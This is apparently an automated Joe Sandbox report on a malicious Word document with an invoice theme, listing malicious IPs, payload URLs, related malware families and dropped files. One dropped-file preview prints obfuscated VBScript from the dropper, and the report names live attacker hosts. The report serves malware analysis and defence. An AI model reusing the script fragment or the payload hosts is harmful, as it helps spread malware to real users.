                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.215.209.78
                                                                          ip.1017.filemail.comCanada
                                                                          32156HUMBER-COLLEGECAtrue
                                                                          188.114.97.3
                                                                          paste.eeEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          141.98.10.88
                                                                          pus.rollerswpush.euLithuania
                                                                          209605HOSTBALTICLTtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1551308
                                                                          Start date and time:2024-11-07 16:49:58 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 57s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:14
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.expl.evad.winDOC@12/16@6/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 33.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 85%
                                                                          • Number of executed functions: 18
                                                                          • Number of non-executed functions: 7
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .doc
                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                          • Attach to Office via COM
                                                                          • Active ActiveX Object
                                                                          • Scroll down
                                                                          • Close Viewer
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                          • Execution Graph export aborted for target EQNEDT32.EXE, PID 3600 because there are no executed function
                                                                          • Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
                                                                          TimeTypeDescription
                                                                          10:50:50API Interceptor274x Sleep call for process: EQNEDT32.EXE modified
                                                                          10:50:53API Interceptor1663x Sleep call for process: wscript.exe modified
                                                                          10:50:58API Interceptor242x Sleep call for process: powershell.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          142.215.209.78Purchase order.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                            188.114.97.3QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • filetransfer.io/data-package/oV9U9W0U/download
                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/21zJLAjt/download
                                                                            SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                                            • www.dodsrprolev.shop/42jb/
                                                                            Hesap.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rtprajalojago.live/74ri/
                                                                            file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • sosipisos.cc/SXQNMYTM.exe
                                                                            7RAK4mZ6nc.exeGet hashmaliciousMetasploitBrowse
                                                                            • downsexv.com:8080/pptFudI4N_bZd9h2vlE2HgX6nJupnvnNvPpodtqLmxX2OC5MJtjR8Cw2hx7Jj0FM_ofkLnmJ
                                                                            Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                            • www.bzxs.info/v58i/
                                                                            icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                            • www.figa1digital.services/zjtq/
                                                                            xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • paste.ee/d/Sv5Cw
                                                                            ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bayarcepat19.click/blmi/
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ip.1017.filemail.comPurchase order.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                            • 142.215.209.78
                                                                            paste.eeAviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                            • 188.114.96.3
                                                                            createdbestthingswithgoodnewswithgreatfriendship.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                            • 188.114.96.3
                                                                            xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            asegurar.vbsGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.96.3
                                                                            greenthingswithgreatnewsforgetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                            • 188.114.96.3
                                                                            Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.97.3
                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.114.97.3
                                                                            EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            HUMBER-COLLEGECAPurchase order.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                            • 142.215.209.78
                                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                            • 142.214.125.223
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 142.215.221.136
                                                                            novo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 142.215.84.185
                                                                            https://download.metatrader.com/cdn/web/gvd.markets.capital/mt5/gvdmarkets5setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 142.215.208.235
                                                                            botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 142.215.36.244
                                                                            https://internetempresas5.itau.com.br/banklinepj/GRIPNET/bklcom.dllGet hashmaliciousUnknownBrowse
                                                                            • 142.215.190.74
                                                                            7ALXuklmvu.elfGet hashmaliciousMiraiBrowse
                                                                            • 142.214.231.240
                                                                            sora.arm-20240504-0115.elfGet hashmaliciousMiraiBrowse
                                                                            • 142.214.57.229
                                                                            3rU5FsjiS4.elfGet hashmaliciousUnknownBrowse
                                                                            • 142.214.231.234
                                                                            CLOUDFLARENETUSQUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.97.3
                                                                            Vakhdevi Resume 2024.jsGet hashmaliciousGookitLoaderBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 104.21.5.155
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 104.21.5.155
                                                                            https://airtable.com/appghQwrDrrrgLn7v/shrt3wUeRvHDcMT9uGet hashmaliciousUnknownBrowse
                                                                            • 172.64.155.119
                                                                            SecuriteInfo.com.Win64.Evo-gen.6610.27408.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.21.1.82
                                                                            Multi Graphics Inc CustomerVendor Form.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            • 188.114.96.3
                                                                            fz9TDYlgmf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                            • 172.67.164.216
                                                                            https://gofile.me/7wODs/99hfK37gzGet hashmaliciousAnnabelleBrowse
                                                                            • 1.1.1.1
                                                                            HOSTBALTICLTDOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 141.98.10.40
                                                                            Contract #U2116 KB #U2013 08152024 - 1.pif.exeGet hashmaliciousRedLineBrowse
                                                                            • 141.98.10.33
                                                                            PRODUCT OVERVIEW.docGet hashmaliciousUnknownBrowse
                                                                            • 141.98.10.11
                                                                            tppc.elfGet hashmaliciousUnknownBrowse
                                                                            • 141.98.10.95
                                                                            sarm6.elfGet hashmaliciousMiraiBrowse
                                                                            • 141.98.10.95
                                                                            TRIAL IMG_00O0125RDER.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 141.98.10.120
                                                                            1316wjL1Ep.elfGet hashmaliciousUnknownBrowse
                                                                            • 141.98.10.95
                                                                            17213054441f2891f24374c97759e4ac14183d6cfaeabe4240dc8794e61fa899b9e40b62fb429.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 141.98.10.11
                                                                            Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                            • 141.98.10.47
                                                                            171232524570452cfc1123de8b7cabf91834cbebe0e4fd1dae96e0b4418fab427bf67de7f5439.dat-decoded.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 141.98.10.48
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            05af1f5ca1b87cc9cc9b25185115607dPurchase order.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            Product_Samples.docGet hashmaliciousDarkTortilla, XWormBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            KSACURFQAAB01.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            Payment Advice-RefA22D4YdWsbE56.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            Payment Advice-RefA22D4YdWsbE5.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            Scan docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                            • 188.114.97.3
                                                                            • 142.215.209.78
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4760
                                                                            Entropy (8bit):4.834060479684549
                                                                            Encrypted:false
                                                                            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                            MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.34726597513537405
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlll:Nll
                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:@...e...........................................................
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:ASCII text, with very long lines (1482), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):13340
                                                                            Entropy (8bit):5.324695026452157
                                                                            Encrypted:false
                                                                            SSDEEP:192:kegx5MRxQxc9xA1STgS05oXQYuDLaZ7YhahAODmvEUaHiWJHZERwl+fDW3CLM0FF:lqyRxQPSy5oeLMakrEGl+fDW3CLM4
                                                                            MD5:A493B3A76674E752564AD410AFED5875
                                                                            SHA1:9911A07078F2FF352BAE9C8D9401CB67817681A6
                                                                            SHA-256:5A546D1A9A105C9A6887E80B2698B98D5A8CCB38E1AC3C01BACD14A7A44BF902
                                                                            SHA-512:28E513300D4DD3637F11F9E1A273B101E2D48ABC6312C0AF4F9E119236003B4258AE44FAF8CBBB42DF7F8A7B680E6787233F556481CF41B63F6AAB5E89CFE7EC
                                                                            Malicious:true
                                                                            Preview:QNucChJgPmhIFJyWsi . crEaTeoBjEcT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("d2pTakNqcmppanBqVGouanNqSGpFakxqbGo="))).ExPandEnvIRoNmENtSTRInGs(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("JU1BTVBNUE1kTUFNVE1hTSVN"))) . & . pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("XGNnY0RjSGN4Y3NjcWN0Y0Rjb2NkY1JjbmNsY3RjSmNGY09jZGMuY2pjc2M=")), . juQbbnnShrcFRLRQMD . : . creatEobJECT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("V3dTd2N3cndJd1B3dHcud1N3SHdFd0x3bHc="))).RUn . crEaTeoBjEcT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("d2pTakNqcmppanBqVGouanNqSGpFakxqbGo="))).ExPandEnvIRoNmENtSTRInGs(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("JU1BTVBNUE1kTUFNVE1hTSVN"))) . & . pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("XGNnY0RjSGN4Y3NjcWN0Y0Rjb2NkY1JjbmNsY3RjSmNGY09jZGMuY2pjc2M=")) . : . Function juQbbnnShrcFRLRQMD() ..: ..juQbbnnShrcFRLRQMD = OqxvoIfKbSrLaezgFi..Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, wylHMZFOLmBmUmmprr) ..: ..Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, DRwZnTmnOFtbaxyiPX) ..: ..Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLR
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:CE338FE6899778AACFC28414F2D9498B
                                                                            SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                            SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                            SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                            Malicious:false
                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16896
                                                                            Entropy (8bit):3.586566405359145
                                                                            Encrypted:false
                                                                            SSDEEP:384:H037BLyvvlg8QC4LwYEKbzmYTQdBH+kyxJZJYqlpUl8S93t3wppmRa:4UlhKLthPmYTQSxZmqlpUpVwpGa
                                                                            MD5:D7B52FBF563604E77A524B1EFE51B9D8
                                                                            SHA1:062A37DE6BFEED7196D8C234DCD1734C569CAB09
                                                                            SHA-256:84D4A910ADAF8C4F8DAEBE369F6BD37F2C9FAC5C512AB4EA3DD311C312626A61
                                                                            SHA-512:E83CEA07EF86324A148A30C4E886E09DFC23A25EC76C8EFD050BCDEDE485939EE3082F8776A9C588E80B4BBF8099EBF3D5364B0F73DE52ED17AC3D7E18FC38DF
                                                                            Malicious:false
                                                                            Preview:9.6.0.5.7.4.4.5.<.?...2.^.|.(.@.5.].#.<.@.>.1.9.?.?.2...4.:.#.(...9.~.3.1.].?.+./.1.?.+.>.].+...[...,.~.;.,.?.?.|.5.%.<.0.9.5.%.^.?./.?.,.?./.|.9.?.|.?.=.<.-.;.(./.'./.^.-.^.].~.6.3.[.,.$.@.?.?.:.?.4.5.3.?.).&.|.7.`.^.?.2.?.9.?.;.6._.5...+.|.;.8.6.).?.7.8.|.]...`.!.+.;.<.].7.#.`.`.7.#...`.`./.*.9...%./.+...0...!...%.`.~.#.1...)...~.?.].[.#.?.&.$.*.(.:.$.4.8.]...?.:.].%.].4.!.>.#.:.$...|.1.-.[.4.?.8.&.[.'.6.]...(.8.$.6.].+.'.%.7...%./.$.?.4.4...&.5.1...>._.[._.%.&.?.'.).'.?.-.1.,._.).).6.*.%.$.)._.3.|._.3._.?.]./.<...%.%.-.-.*.?.*.+.@.5.@.:.:.<.(.(.].0.@.5.+.....^.?.;.(.[.!.%.9.%.?.3._.7.3.9./.2.?.-.<.|./.3.<.?.|.(...6.2...@.@.:.,.../.|.].)./...[.-.]...].<.*./.+...^.^.:...,...@.;.?._.!.~.2.*.7.9.&.|.'...(.?.?.*.!.<.%.~.>.2.6.'.=.!.^.9.|.&.5.`.3.'.].3.2.8.&._.~.?.?.;.3.<.;.?.).>.<.!.4.....`.=.#.1.?...^.@.!.%.|.|.;.0.,...^...=.`.].=.|.=.1.`.(.).`.[.9./.'.?.0.#.=.<.).1.%...?.|.*.;.&...|.(.^.@.?.,.&.|...9.|.5.=.4.*.....|.5./.;.8...,.[.(.|.:.;.(.+._.0.~.9.?.=.?._.'.>./.'.].^.%.<.;.8.7.!.).`.
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):0.05390218305374581
                                                                            Encrypted:false
                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                            Malicious:false
                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Thu Nov 7 14:50:48 2024, length=62723, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):1164
                                                                            Entropy (8bit):4.551506310607435
                                                                            Encrypted:false
                                                                            SSDEEP:12:8LkogXg/XAlCPCHaXKB/1B/5YXX+WTAcuoNFtyWRmicvbk01/AhtyWREDtZ3Yill:8v/XT674XlCwrTex/0rODv3qx57u
                                                                            MD5:C9A4F6BC34B51400AB44922D49418A09
                                                                            SHA1:563FF8E38BE90A155A2CE837E827798ED1FBDB44
                                                                            SHA-256:6353F0DCEF372AEC945FD9086E3291D0FCA5F77A62470CBDBE64DD3DA8C66E47
                                                                            SHA-512:2A2D193A6374FD1F4FE7B3779400590AC1B0DA03931E87CA74289ED67FEF9BD44FE59ADC91CB3DE41290FA9CD6862123A91F5E58D7E95B9BCC1533825E791A20
                                                                            Malicious:false
                                                                            Preview:L..................F.... .....T.r.....T.r......,1...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....gYV~..user.8......QK.XgYV~*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....gYY~ .CONFIR~1.DOC..........WD..WD.*.........................C.o.n.f.i.r.m.a.c.i.X.n.X.d.e.X.f.a.c.t.u.r.a.X.P.e.d.i.d.o.X.a.d.i.c.i.o.n.a.l...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\675052\Users.user\Desktop\ConfirmaciXnXdeXfacturaXPedidoXadicional.doc.C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.n.f.i.r.m.a.c.i.X.n.X.d.e.X.f.a.c.t.u.r.a.X.P.e.d.i.d.o.X.a.d.i.c.i.o.n.a.l...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:Generic INItialization configuration [folders]
                                                                            Category:dropped
                                                                            Size (bytes):114
                                                                            Entropy (8bit):4.432695345921772
                                                                            Encrypted:false
                                                                            SSDEEP:3:M19fCsFN/8Sm41fCsFN/8Sv:Mhpx
                                                                            MD5:58BCB87A43F607F7C8CE8D49026730C4
                                                                            SHA1:4DCBB0229783AB9B86A4051C18A5160855F83F53
                                                                            SHA-256:BB3607F6C433E479074709B3852A7FF412086809527A0D38C8EA2DCAA4242AA8
                                                                            SHA-512:16B71C0771EBDD06A48A31CB1542E7EEC5A9CDD6506F113C6FEF95FF22782D9AF3D35DA1617D45E47D16BD11E217B8895B30C2E2F6511F07F6138BCA6BD09475
                                                                            Malicious:false
                                                                            Preview:[doc]..ConfirmaciXnXdeXfacturaXPedidoXadicional.LNK=0..[folders]..ConfirmaciXnXdeXfacturaXPedidoXadicional.LNK=0..
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.4797606462020307
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                            MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                            SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                            SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                            SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                            Malicious:false
                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (375), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1532
                                                                            Entropy (8bit):3.6504256971958946
                                                                            Encrypted:false
                                                                            SSDEEP:24:QNUCoPAolo1yihIZTLC6PQZEPCJP6iYuA+i:LCoPAl8ihilPO0IP6iY1D
                                                                            MD5:4B8526F8F8E600FE9EAE9A56E272FEB6
                                                                            SHA1:4BB710AEC673F30B1DC5947C175AC1C8F75A21DE
                                                                            SHA-256:FD1F79B9E5ABAB3F406A23418ED60C1E83790F9225105FA896431E441CF9440A
                                                                            SHA-512:64F7FB57482F73472BADC0D24A30A28BB6971ACD8D9077BEB2F40BFF2D6E51CB84ED9C4129302E45C9F7032718EE45F45814CC3CAC179135B74788E968949B1E
                                                                            Malicious:true
